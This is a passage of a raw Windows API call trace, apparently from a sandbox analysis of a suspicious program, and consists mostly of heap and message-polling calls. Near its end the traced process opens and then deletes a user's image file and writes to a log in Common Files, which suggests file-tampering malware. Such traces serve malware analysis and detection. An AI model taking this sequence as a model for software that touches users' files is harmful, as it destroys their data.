RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0189.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0189.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0189.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0189.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.368] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.369] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0189.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0189.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0189.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.371] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.371] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0189.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.372] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0189.372] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.373] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\evgfmja.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0189.373] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.373] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.373] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0189.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.373] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.373] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.373] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.374] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.374] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.374] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.374] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0189.374] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.374] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.374] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.374] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.374] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.374] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.374] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", lpFilePart=0x0) returned 0x50 [0189.374] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x16192720, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 0x90af58 [0189.374] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\evgfmja.png")) returned 1 [0189.376] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc05e48a0, ftCreationTime.dwHighDateTime=0x1d5dfa5, ftLastAccessTime.dwLowDateTime=0x283be5b0, ftLastAccessTime.dwHighDateTime=0x1d5dc0c, ftLastWriteTime.dwLowDateTime=0x16192720, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa1fa, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="EVGfmjA.png", cAlternateFileName="")) returned 0 [0189.376] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.379] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.379] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.380] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.380] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.380] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.408] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.408] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.408] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0189.408] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.409] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2c6f, lpOverlapped=0x0) returned 1 [0189.409] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2c6f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.409] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.409] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.410] RtlAllocateHeap 